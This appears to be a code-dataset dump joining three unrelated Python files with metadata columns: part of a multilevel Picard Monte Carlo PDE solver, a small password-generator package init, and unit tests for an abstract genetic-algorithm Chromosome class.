- np.array([self.eval_config.reference_sol[self.eqn_config.dim.index(self.mlp.dim)],]*self.eval_config.num_realization))
norm_ref_sol = np.linalg.norm(self.eval_config.reference_sol[self.eqn_config.dim.index(self.mlp.dim)])
errors = np.zeros(5)
errors[0] = np.sum(np.linalg.norm(diff, axis=1)) / self.eval_config.num_realization # L1 error
errors[1] = np.sum(np.linalg.norm(diff, axis=1)) / (self.eval_config.num_realization * norm_ref_sol) # rel L1 error
errors[2] = np.linalg.norm(diff) / np.sqrt(self.eval_config.num_realization) # L2 error
errors[3] = np.linalg.norm(diff) / (np.sqrt(self.eval_config.num_realization) * norm_ref_sol) # rel L2 error
if(self.eval_config.num_realization > 1): errors[4] = np.linalg.norm(diff) / np.sqrt(self.eval_config.num_realization - 1) # empirical SD
return errors
def costEval(self, samples, theta):
"""
Evaluates the costs, that are the number of scalar random variables which have to be drawn in
one realization of the MLP algorithm.
Parameters
---------
samples: dict
Dict of the pregenerated samples in advanced mode from generateSamples.py
theta: int
index of the realization of the current MLP run.
"""
if (samples == None):
return "Not evaluated"
else:
cost = 0
for keys in samples[theta].keys():
if(self.mlp.sampleNeeded[keys[4]]):
if(keys[4] == 2):
for k in range(len(samples[theta][keys])):
if hasattr(samples[theta][keys][k], 'shape'):
N = samples[theta][keys][k].shape[0]
d = samples[theta][keys][k].shape[1]
n = 5 # here implement logic
cost += n * N * d * 2 # additional cost for Ikpw
elif(keys[4] == 3):
for k in range(len(samples[theta][keys])):
if hasattr(samples[theta][keys][k], 'shape'):
N = samples[theta][keys][k].shape[0]
d = samples[theta][keys][k].shape[1]
n = 5 # here implement logic
M = d*(d-1)//2
cost += n * N * d * 2 + N * M # +++ additional cost for Iwik
elif(keys[4] == 4):
for k in range(len(samples[theta][keys])):
if hasattr(samples[theta][keys][k], 'shape'):
N = samples[theta][keys][k].shape[0]
d = samples[theta][keys][k].shape[1]
n = 5 # here implement logic
M = d*(d-1)//2
cost += n * N * d * 2 + N * d + N * M # +++ additional cost for Imr
else:
cost += len(np.vstack(samples[theta][keys]).flatten())
return cost
def MLPlogging(self, training_history, samples):
"""
Computes the solution average, the L1 error, the relative L1 error, the L2 error,
relative L2 error, the maximal number of evaluations of 1D random variables per realization,
and the average elapsed time per realization for a given training_history
Parameters
---------
training_history: np.ndarray
Contains for each realization an array [iteration number, realization values, elapsed time]
"""
errors = self.errors(np.array(training_history)[:,1])
(training_history.append([self.mlp.dim,
self.mlp.num_iteration,
np.mean(np.array(training_history)[:,1], axis=0),
self.eval_config.reference_sol[self.eqn_config.dim.index(self.mlp.dim)],
errors[0],
errors[1],
errors[2],
errors[3],
errors[4],
np.mean(np.hstack(np.array(training_history)[:,2]))]))
logging.info("Reference Solution: %s," % training_history[-1][3])
logging.info("Solution Average: %s," % training_history[-1][2])
logging.info("L1 Error: %f" % training_history[-1][4])
logging.info("Relative L1 Error: %f" % training_history[-1][5])
logging.info("L2 Error: %f" % training_history[-1][6])
logging.info("Relative L2 Error: %f" % training_history[-1][7])
logging.info("Empirical Standard Deviation: %f" % training_history[-1][8])
logging.info("Average Elapsed Time per Realization: %f" % training_history[-1][9])
if(samples != None): logging.info("Average Sampled 1D RV per Realization: %d" % np.mean(np.hstack(np.array(training_history[-(len(samples)+1):-1])[:,3])))
return training_history
def mlp_call_multiprocess(self, f, g, dXsample, n: int, M: int, l: int, x: np.ndarray, t_approx: float, result: np.ndarray, active: bool, advanced: list):
"""
Auxiliary function for mlp_call routine when multiprocess == True. This function computes the Monte Carlo sum
involving the difference of the nonlinearity f.
Parameters
---------
f : callable(t,x,v)
Computes the gradient-dependent nonlinearity of a semilinear
partial differential equation
g: callable(x)
Computes the terminal condition of the pde at terminal time T
dXsample: callable(t_start, t_end, x, dW)
Solves the SDE for a given approximation method
dIsample: callable(t_start, t_end, x, dW, dX)
Solves the derivative SDE for a given approximation method
n: int
Iteration step
M: int
Basis of number multilevel samples
l: int
Iteration step of the MLP approxmation in the Monte Carlo
sum involving the difference of the nonlinearity of a
MLP approximation at iteration step n
x: array
Value of the state space which is approximated by the
MLP approximation
t_approx: float
Time of the time-space point which is approximated by
the MLP approximation
result: np.ndarray
Either None or an array. If result is an array, then mlp_call_multiprocess
is called by a seperate process/core.
active: boolean
Checks if this routine is called within a new physical core
advanced: list
If advanced[0] == None, then the routine is called in the non-advanced mode, i.e. no pre-generated samples
are used. Otherwise, advanced[0] is the dict of pre-generated samples, advanced[1] carries the history_index
(see hist_index and pos_index in load_mlp_generateSamples for more information), and advanced[2] carries the current
recursive depth "level" (see level load_mlp_generateSamples for more information).
Returns
-------
y: float
Monte Carlo sum value involving the difference of the nonlinearity f of the MLP approximation
at time t_approx and state x
"""
rhs_f = np.zeros(self.eqn_config.dim_system)
rhs_f_diff = np.zeros(self.eqn_config.dim_system)
# Case l=0
if(l==0):
for i in range(M**n):
# calculate right-hand side f
if(advanced[0] == None):
# generate sample data and sample state
r = np.random.uniform(0,1,1)
R = t_approx + (self.mlp.total_time - t_approx)*r
dX = dXsample(t_approx, R, x)[0]
else:
r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
R = t_approx + (self.mlp.total_time - t_approx)*r
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],2,l,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, R, x, dW)[0]
rhs_f_diff = rhs_f_diff + f(R, dX[-1], self.mlp_call(f, g, dXsample, 0, M, dX[-1], R, False, advanced))
rhs_f = (self.mlp.total_time - t_approx) * (rhs_f_diff / (M**n))
# Case l > 0
else:
for i in range(M**(n-l)):
# calculate right-hand side f
if(advanced[0] == None):
# generate sample data and sample state
r = np.random.uniform(0,1,1)
R = t_approx + (self.mlp.total_time - t_approx)*r
dX = dXsample(t_approx, R, x)[0]
rhs_f_diff = (rhs_f_diff
+ f(R, dX[-1], self.mlp_call(f, g, dXsample, l, M, dX[-1], R, False, advanced))
- f(R, dX[-1], self.mlp_call(f, g, dXsample, l-1, M, dX[-1], R, False, advanced)))
else:
r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
R = t_approx + (self.mlp.total_time - t_approx)*r
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],2,l,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, R, x, dW)[0]
rhs_f_diff = (rhs_f_diff
+ f(R, dX[-1], self.mlp_call(f, g, dXsample, l, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,l,), advanced[2]+1]))
- f(R, dX[-1], self.mlp_call(f, g, dXsample, l-1, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,-(l-1),), advanced[2]+1])))
rhs_f = (self.mlp.total_time - t_approx) * (rhs_f_diff / (M**(n-l)))
if(active):
for r in range(self.eqn_config.dim_system):
result[r] = rhs_f[r].flatten()
else:
return rhs_f.flatten()
def mlp_call(self, f, g, dXsample, n: int, M: int, x: np.ndarray, t_approx: float, multiprocess: bool, advanced: list):
"""
Approximates the solution of a parabolic semilinear partial differential equation with gradient-independent
nonlinearity (or stochastic fixed point equation) at the time-space point (t_approx, x) with the full-history
recursive multilevel picard iteration approximation algorithm.
Parameters
---------
f : callable(t,x,v)
Computes the gradient-dependent nonlinearity of a semilinear
partial differential equation
g: callable(x)
Computes the terminal condition of the pde at terminal time T
dXsample: callable(t_start, t_end, x, dW)
Solves the SDE for a given approximation method
n: int
Iteration step
M: int
Basis of number multilevel samples
x: array
Value of the state space which is approximated by the
MLP approximation
t_approx: float
Time of the time-space point which is approximated by
the MLP approximation
multiprocess: boolean
Enables or Disables parallel computing version of the MLP
approximation algorithm
advanced: list
If advanced[0] == None, then the routine is called in the non-advanced mode, i.e. no pre-generated samples
are used. Otherwise, advanced[0] is the dict of pre-generated samples, advanced[1] carries the history_index
(see hist_index and pos_index in load_mlp_generateSamples for more information), and advanced[2] carries the current
recursive depth "level" (see level load_mlp_generateSamples for more information).
Returns
-------
y: float
MLP approximation value at time t_approx and state x
"""
if(n==0):
return np.zeros(self.eqn_config.dim_system)
else:
# Here we have the multiprocess version of the MLP algorithm.
if(multiprocess):
threads = [None] * self.mlp.num_iteration
results = [None] * self.mlp.num_iteration
for l in range(n - 1, n - min(int(multiprocessing.cpu_count()/2), n+1), - 1):
results[l] = multiprocessing.Array("d",self.eqn_config.dim_system)
threads[l] = multiprocessing.Process(target=self.mlp_call_multiprocess, args=(f, g, dXsample, n, M, l, x, t_approx, results[l], True, advanced))
threads[l].start()
for l in range(n - min(int(multiprocessing.cpu_count()/2), n+1), -1, -1):
results[l] = self.mlp_call_multiprocess(f, g, dXsample, n, M, l, x, t_approx, None, False, advanced)
rhs_g = np.zeros(self.eqn_config.dim_system)
rhs_f = np.zeros(self.eqn_config.dim_system)
# Compute in the meantime the Monte Carlo sum involving the terminal condition g
for i in range(M**n):
# sample state
if(advanced[0] == None):
dX = dXsample(t_approx, self.mlp.total_time, x)[0]
else:
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],1,0,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, self.mlp.total_time, x, dW)[0]
rhs_g = rhs_g + g(dX[-1])
rhs_g = rhs_g/(M**n)
# Gather the results from the threads
for l in range(n - 1, n - min(int(multiprocessing.cpu_count()/2), n+1), - 1):
threads[l].join()
rhs_f = rhs_f + results[l]
for l in range(n - min(int(multiprocessing.cpu_count()/2), n+1), -1, -1):
rhs_f = rhs_f + results[l]
# Here starts the single core version of the MLP approximation algorithm
else:
rhs_g = np.zeros(self.eqn_config.dim_system)
rhs_f = np.zeros(self.eqn_config.dim_system)
rhs_f_diff = np.zeros(self.eqn_config.dim_system)
# Compute the Monte Carlo sum involving the terminal condition g
for i in range(M**n):
# sample state
if(advanced[0] == None):
dX = dXsample(t_approx, self.mlp.total_time, x)[0]
else:
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],1,0,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, self.mlp.total_time, x, dW)[0]
rhs_g = rhs_g + g(dX[-1])
rhs_g = rhs_g/(M**n)
# Compute the Monte Carlo sum involving the difference of the nonlinearity f
## Case l=0
for i in range(M**n):
# sample state
if(advanced[0] == None):
r = np.random.uniform(0,1,1)
R = t_approx + (self.mlp.total_time - t_approx)*r
dX = dXsample(t_approx, R, x)[0]
else:
r = advanced[0][(advanced[2],2,0,i,0)+advanced[1]]
R = t_approx + (self.mlp.total_time - t_approx)*r
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],2,0,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, R, x, dW)[0]
rhs_f_diff = rhs_f_diff + f(R, dX[-1], self.mlp_call(f, g, dXsample, 0, M, dX[-1], R, False, advanced))
rhs_f = rhs_f + (self.mlp.total_time - t_approx) * (rhs_f_diff / (M**n))
## Case l > 0
for l in range(1, n):
rhs_f_diff = np.zeros(self.eqn_config.dim_system)
for i in range(M**(n-l)):
# sample state
if(advanced[0] == None):
r = np.random.uniform(0,1,1)
R = t_approx + (self.mlp.total_time - t_approx)*r
dX = dXsample(t_approx, R, x)[0]
rhs_f_diff = (rhs_f_diff
+ f(R, dX[-1], self.mlp_call(f, g, dXsample, l, M, dX[-1], R, False, advanced))
- f(R, dX[-1], self.mlp_call(f, g, dXsample, l-1, M, dX[-1], R, False, advanced)))
else:
r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
R = t_approx + (self.mlp.total_time - t_approx)*r
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],2,l,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, R, x, dW)[0]
rhs_f_diff = (rhs_f_diff
+ f(R, dX[-1], self.mlp_call(f, g, dXsample, l, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,l,), advanced[2]+1]))
- f(R, dX[-1], self.mlp_call(f, g, dXsample, l-1, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,-(l-1),), advanced[2]+1])))
rhs_f = rhs_f + (self.mlp.total_time - t_approx) * (rhs_f_diff / (M**(n-l)))
return rhs_g.flatten() + rhs_f.flatten()
def mlp_call_multiprocess_grad(self, f, g, dXsample, dIsample, n: int, M: int, l: int, x: np.ndarray, t_approx: float, result: np.ndarray, active: bool, advanced: list):
"""
Auxiliary function for mlp_call_grad routine when multiprocess == True. This function computes the Monte Carlo sum
involving the difference of the nonlinearity f.
Parameters
---------
f : callable(t,x,v)
Computes the gradient-dependent nonlinearity of a semilinear
partial differential equation
g: callable(x)
Computes the terminal condition of the pde at terminal time T
dXsample: callable(t_start, t_end, x, dW)
Solves the SDE for a given approximation method
dIsample: callable(t_start, t_end, x, dW, dX)
Solves the derivative SDE for a given approximation method
n: int
Iteration step
M: int
Basis of number multilevel samples
l: int
Iteration step of the MLP approxmation in the Monte Carlo
sum involving the difference of the nonlinearity of a
MLP approximation at iteration step n
x: array
Value of the state space which is approximated by the
MLP approximation
t_approx: float
Time of the time-space point which is approximated by
the MLP approximation
result: np.ndarray
Either None or an array. If result is an array, then mlp_call_multiprocess
is called by a seperate process/core.
active: boolean
Checks if this routine is called within a new physical core
advanced: list
If advanced[0] == None, then the routine is called in the non-advanced mode, i.e. no pre-generated samples
are used. Otherwise, advanced[0] is the dict of pre-generated samples, advanced[1] carries the history_index
(see hist_index and pos_index in load_mlp_generateSamples for more information), and advanced[2] carries the current
recursive depth "level" (see level load_mlp_generateSamples for more information).
Returns
-------
y: float
Monte Carlo sum value involving the difference of the nonlinearity f of the MLP approximation
at time t_approx and state x
"""
rhs_f = np.zeros(shape=(self.eqn_config.dim_system,1))
rhs_f_diff = np.zeros(shape=(self.eqn_config.dim_system,1))
# Case l=0
if(l==0):
for i in range(M**n):
if(advanced[0] == None):
# generate sample data and sample state
r = np.random.power(self.eqn_config.time_dist_exponent,1)
R = t_approx + (self.mlp.total_time - t_approx)*r
(dX, dW) = dXsample(t_approx, R, x)
dI = dIsample(t_approx, R, x, dW, dX)
else:
r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
R = t_approx + (self.mlp.total_time - t_approx)*r
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],2,l,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, R, x, dW)[0]
dI = dIsample(t_approx, R, x, dW, dX)
rhs_f_diff = (rhs_f_diff
+ (r**(1-self.eqn_config.time_dist_exponent)) * f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, 0, M, dX[-1], R, False, advanced)) * dI)
rhs_f = (self.mlp.total_time - t_approx) * (rhs_f_diff / (self.eqn_config.time_dist_exponent * (M**n)))
# Case l > 0
else:
for i in range(M**(n-l)):
if(advanced[0] == None):
# generate sample data and sample state
r = np.random.power(self.eqn_config.time_dist_exponent,1)
R = t_approx + (self.mlp.total_time - t_approx)*r
(dX, dW) = dXsample(t_approx, R, x)
dI = dIsample(t_approx, R, x, dW, dX)
rhs_f_diff = (rhs_f_diff
+ ((r**(1-self.eqn_config.time_dist_exponent)) * (f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l, M, dX[-1], R, False, advanced))
- f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l-1, M, dX[-1], R, False, advanced)))) * dI)
else:
r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
R = t_approx + (self.mlp.total_time - t_approx)*r
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],2,l,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, R, x, dW)[0]
dI = dIsample(t_approx, R, x, dW, dX)
rhs_f_diff = (rhs_f_diff
+ ((r**(1-self.eqn_config.time_dist_exponent))
* (f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,l,), advanced[2]+1]))
- f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l-1, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,-(l-1),), advanced[2]+1])))) * dI)
rhs_f = (self.mlp.total_time - t_approx) * (rhs_f_diff / (self.eqn_config.time_dist_exponent * (M**(n-l))))
if(active):
for r in range(self.eqn_config.dim_system):
for d in range(self.mlp.dim + 1):
result[r*(self.mlp.dim + 1) + d] = rhs_f[r][d]
else:
return rhs_f.reshape((self.mlp.dim_system, self.mlp.dim + 1))
def mlp_call_grad(self, f, g, dXsample, dIsample, n: int, M: int, x: np.ndarray, t_approx: float, multiprocess: bool, advanced: list):
"""
Approximates the solution of a parabolic semilinear partial differential equation with gradient-dependent
nonlinearity (or stochastic fixed point equation) at the time-space point (t_approx, x) with the full-history
recursive multilevel picard iteration approximation algorithm.
Parameters
---------
f : callable(t,x,v)
Computes the gradient-dependent nonlinearity of a semilinear
partial differential equation
g: callable(x)
Computes the terminal condition of the pde at terminal time T
dXsample: callable(t_start, t_end, x, dW)
Solves the SDE for a given approximation method
dIsample: callable(t_start, t_end, x, dW, dX)
Solves the derivative SDE for a given approximation method
n: int
Iteration step
M: int
Basis of number multilevel samples
x: array
Value of the state space which is approximated by the
MLP approximation
t_approx: float
Time of the time-space point which is approximated by
the MLP approximation
multiprocess: boolean
Enables or Disables parallel computing version of the MLP
approximation algorithm
advanced: list
If advanced[0] == None, then the routine is called in the non-advanced mode, i.e. no pre-generated samples
are used. Otherwise, advanced[0] is the dict of pre-generated samples, advanced[1] carries the history_index
(see hist_index and pos_index in load_mlp_generateSamples for more information), and advanced[2] carries the current
recursive depth "level" (see level load_mlp_generateSamples for more information).
Returns
-------
y: float
MLP approximation value at time t_approx and state x
"""
if(n==0):
return np.zeros(shape=(self.eqn_config.dim_system, self.mlp.dim + 1))
else:
# Here we have the multiprocess version of the MLP algorithm.
if(multiprocess):
threads = [None] * self.mlp.num_iteration
results = [None] * self.mlp.num_iteration
# Compute the Monte Carlo summands involving the difference of the nonlinearity f by
# using for each summand a single process. Bound the number of processes
# by the amount of physical cores of your system.
for l in range(n - 1, n - min(int(multiprocessing.cpu_count()/2), n+1), - 1):
results[l] = multiprocessing.Array("d",self.eqn_config.dim_system * (self.mlp.dim + 1))
threads[l] = multiprocessing.Process(target=self.mlp_call_multiprocess_grad, args=(f, g, dXsample, dIsample, n, M, l, x, t_approx, results[l], True, advanced))
threads[l].start()
for l in range(n - min(int(multiprocessing.cpu_count()/2), n+1), -1, -1):
results[l] = self.mlp_call_multiprocess_grad(f, g, dXsample, dIsample, n, M, l, x, t_approx, None, False, advanced)
rhs_g = np.zeros(shape=(self.eqn_config.dim_system,1))
rhs_f = np.zeros(shape=(self.eqn_config.dim_system,1))
rhs_f_threads = np.zeros(self.eqn_config.dim_system * (self.mlp.dim + 1))
# Compute in the meantime the Monte Carlo sum involving the terminal condition g
for i in range(M**n):
if(advanced[0] == None):
(dX, dW) = dXsample(t_approx, self.mlp.total_time, x)
dI = dIsample(t_approx, self.mlp.total_time, x, dW, dX)
else:
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],1,0,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, self.mlp.total_time, x, dW)[0]
dI = dIsample(t_approx, self.mlp.total_time, x, dW, dX)
rhs_g = rhs_g + (g(dX[-1]) - g(x)) * dI
rhs_g = np.insert(np.zeros((self.eqn_config.dim_system,self.mlp.dim)),0,g(x).flatten(),axis=1) + (rhs_g/(M**n))
# Gather the results from the threads
for l in range(n - 1, n - min(int(multiprocessing.cpu_count()/2), n+1), - 1):
threads[l].join()
rhs_f_threads = rhs_f_threads + results[l]
rhs_f = rhs_f + rhs_f_threads.reshape(self.eqn_config.dim_system, self.mlp.dim + 1)
for l in range(n - min(int(multiprocessing.cpu_count()/2), n+1), -1, -1):
rhs_f = rhs_f + results[l]
# Here starts the single core version of the MLP approximation algorithm
else:
rhs_g = np.zeros(shape=(self.eqn_config.dim_system,1))
rhs_f = np.zeros(shape=(self.eqn_config.dim_system,1))
rhs_f_diff = np.zeros(shape=(self.eqn_config.dim_system,1))
# Compute the Monte Carlo sum involving the terminal condition g
for i in range(M**n):
# sample state
if(advanced[0] == None):
(dX, dW) = dXsample(t_approx, self.mlp.total_time, x)
dI = dIsample(t_approx, self.mlp.total_time, x, dW, dX)
else:
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],1,0,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, self.mlp.total_time, x, dW)[0]
dI = dIsample(t_approx, self.mlp.total_time, x, dW, dX)
rhs_g = rhs_g + (g(dX[-1]) - g(x)) * dI
rhs_g = np.insert(np.zeros((self.eqn_config.dim_system,self.mlp.dim)),0,g(x).flatten(),axis=1) + (rhs_g/(M**n))
# Compute the Monte Carlo sum involving the difference of the nonlinearity f
## Case l=0
for i in range(M**n):
# sample state
if(advanced[0] == None):
r = np.random.power(self.eqn_config.time_dist_exponent,1)
R = t_approx + (self.mlp.total_time - t_approx)*r
(dX, dW) = dXsample(t_approx, R, x)
dI = dIsample(t_approx, R, x, dW, dX)
else:
r = advanced[0][(advanced[2],2,0,i,0)+advanced[1]]
R = t_approx + (self.mlp.total_time - t_approx)*r
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],2,0,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, R, x, dW)[0]
dI = dIsample(t_approx, R, x, dW, dX)
rhs_f_diff = rhs_f_diff + (r**(1-self.eqn_config.time_dist_exponent)) * f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, 0, M, dX[-1], R, False, advanced)) * dI
rhs_f = rhs_f + (self.mlp.total_time - t_approx) * (rhs_f_diff / (self.eqn_config.time_dist_exponent * (M**n)))
## Case l > 0
for l in range(1, n):
rhs_f_diff = np.zeros(shape=(self.eqn_config.dim_system,1))
for i in range(M**(n-l)):
if(advanced[0] == None):
r = np.random.power(self.eqn_config.time_dist_exponent,1)
R = t_approx + (self.mlp.total_time - t_approx)*r
(dX, dW) = dXsample(t_approx, R, x)
dI = dIsample(t_approx, R, x, dW, dX)
rhs_f_diff = (rhs_f_diff
+ ((r**(1-self.eqn_config.time_dist_exponent))
* (f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l, M, dX[-1], R, False, advanced))
- f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l-1, M, dX[-1], R, False, advanced)))) * dI)
else:
r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
R = t_approx + (self.mlp.total_time - t_approx)*r
dW = (load_mlp_generateSamples(samples=advanced[0],
pos_index=(advanced[2],2,l,i),
hist_index=advanced[1],
config=self.mlp.sampleNeeded))
dX = dXsample(t_approx, R, x, dW)[0]
dI = dIsample(t_approx, R, x, dW, dX)
rhs_f_diff = (rhs_f_diff
+ ((r**(1-self.eqn_config.time_dist_exponent))
* (f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,l,), advanced[2]+1]))
- f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l-1, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,-(l-1),), advanced[2]+1])))) * dI)
rhs_f = rhs_f + (self.mlp.total_time - t_approx) * (rhs_f_diff / (self.eqn_config.time_dist_exponent * (M**(n-l))))
return rhs_g.reshape((self.mlp.dim_system, self.mlp.dim + 1)) + rhs_f.reshape((self.mlp.dim_system, self.mlp.dim + 1))
| 55.583554
| 193
| 0.486543
| 4,914
| 41,910
| 4.020554
| 0.063085
| 0.047831
| 0.02961
| 0.029154
| 0.853065
| 0.838994
| 0.826998
| 0.81313
| 0.805892
| 0.791922
| 0
| 0.016927
| 0.413601
| 41,910
| 753
| 194
| 55.657371
| 0.786987
| 0.239203
| 0
| 0.727711
| 1
| 0.00241
| 0.011193
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021687
| false
| 0.00241
| 0.014458
| 0
| 0.06506
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
83cbf328038856a6fe5fedc04da5420b54ba6d82
| 160
|
py
|
Python
|
__init__.py
|
Tauag/SPass
|
bbaba575d2922930ec4730f68e83adff4ab060ac
|
[
"MIT"
] | 2
|
2018-04-27T17:52:10.000Z
|
2018-04-27T19:36:13.000Z
|
__init__.py
|
Tauag/SPass
|
bbaba575d2922930ec4730f68e83adff4ab060ac
|
[
"MIT"
] | 2
|
2018-04-27T13:56:53.000Z
|
2018-04-27T21:46:01.000Z
|
__init__.py
|
Tauag/SPass
|
bbaba575d2922930ec4730f68e83adff4ab060ac
|
[
"MIT"
] | 1
|
2018-04-27T20:55:39.000Z
|
2018-04-27T20:55:39.000Z
|
from spass.generators import generate_random_password, generate_passphrase
from spass.exceptions import ParameterError
from spass.mapper import update_word_map
| 40
| 74
| 0.89375
| 21
| 160
| 6.571429
| 0.666667
| 0.195652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.08125
| 160
| 3
| 75
| 53.333333
| 0.938776
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
f7a8dcf43a6accff0679bc55f95631958e573ba7
| 6,384
|
py
|
Python
|
tests/genetic_algorithm/test_chromosome.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 10
|
2020-07-24T22:04:51.000Z
|
2022-03-25T06:09:48.000Z
|
tests/genetic_algorithm/test_chromosome.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 12
|
2021-04-30T09:53:18.000Z
|
2022-02-25T04:16:02.000Z
|
tests/genetic_algorithm/test_chromosome.py
|
y-tetsu/othello
|
73eabfe22d6b44bbfa0b436e6287e3e7356620f4
|
[
"MIT"
] | 1
|
2021-11-25T13:12:32.000Z
|
2021-11-25T13:12:32.000Z
|
"""Tests of chromosome.py
"""
import unittest
from reversi.genetic_algorithm import Chromosome
class TestChromosome(unittest.TestCase):
"""chromosome
"""
def test_chromosome(self):
Chromosome.fitness("self")
Chromosome.reset_fitness("self")
Chromosome.is_optimal("self")
Chromosome.random_instance()
Chromosome.crossover("self", "other")
Chromosome.mutate("self")
Chromosome.large_mutate("self")
with self.assertRaises(TypeError):
class Test(Chromosome):
pass
test = Test()
with self.assertRaises(TypeError):
class Test(Chromosome):
def reset_fitness(self):
pass
def is_optimal(self):
pass
def random_instance(cls):
pass
def crossover(self, other):
pass
def mutate(self):
pass
def large_mutate(self):
pass
Test.reset_fitness("self")
Test.is_optimal("self")
Test.random_instance("cls")
Test.crossover("self", "other")
Test.mutate("self")
Test.large_mutate("self")
test = Test()
with self.assertRaises(TypeError):
class Test(Chromosome):
def fitness(self):
pass
def is_optimal(self):
pass
def random_instance(cls):
pass
def crossover(self, other):
pass
def mutate(self):
pass
def large_mutate(self):
pass
Test.fitness("self")
Test.is_optimal("self")
Test.random_instance("cls")
Test.crossover("self", "other")
Test.mutate("self")
Test.large_mutate("self")
test = Test()
with self.assertRaises(TypeError):
class Test(Chromosome):
def fitness(self):
pass
def reset_fitness(self):
pass
def random_instance(cls):
pass
def crossover(self, other):
pass
def mutate(self):
pass
def large_mutate(self):
pass
Test.fitness("self")
Test.reset_fitness("self")
Test.random_instance("cls")
Test.crossover("self", "other")
Test.mutate("self")
Test.large_mutate("self")
test = Test()
with self.assertRaises(TypeError):
class Test(Chromosome):
def fitness(self):
pass
def reset_fitness(self):
pass
def is_optimal(self):
pass
def crossover(self, other):
pass
def mutate(self):
pass
def large_mutate(self):
pass
Test.fitness("self")
Test.reset_fitness("self")
Test.is_optimal("self")
Test.crossover("self", "other")
Test.mutate("self")
Test.large_mutate("self")
test = Test()
with self.assertRaises(TypeError):
class Test(Chromosome):
def fitness(self):
pass
def reset_fitness(self):
pass
def is_optimal(self):
pass
def random_instance(cls):
pass
def mutate(self):
pass
def large_mutate(self):
pass
Test.fitness("self")
Test.reset_fitness("self")
Test.is_optimal("self")
Test.random_instance("cls")
Test.mutate("self")
Test.large_mutate("self")
test = Test()
with self.assertRaises(TypeError):
class Test(Chromosome):
def fitness(self):
pass
def reset_fitness(self):
pass
def is_optimal(self):
pass
def random_instance(cls):
pass
def crossover(self, other):
pass
def large_mutate(self):
pass
Test.fitness("self")
Test.reset_fitness("self")
Test.is_optimal("self")
Test.random_instance("cls")
Test.crossover("self", "other")
Test.large_mutate("self")
test = Test()
with self.assertRaises(TypeError):
class Test(Chromosome):
def fitness(self):
pass
def reset_fitness(self):
pass
def is_optimal(self):
pass
def random_instance(cls):
pass
def crossover(self, other):
pass
def mutate(self):
pass
Test.fitness("self")
Test.reset_fitness("self")
Test.is_optimal("self")
Test.random_instance("cls")
Test.crossover("self", "other")
Test.mutate("self")
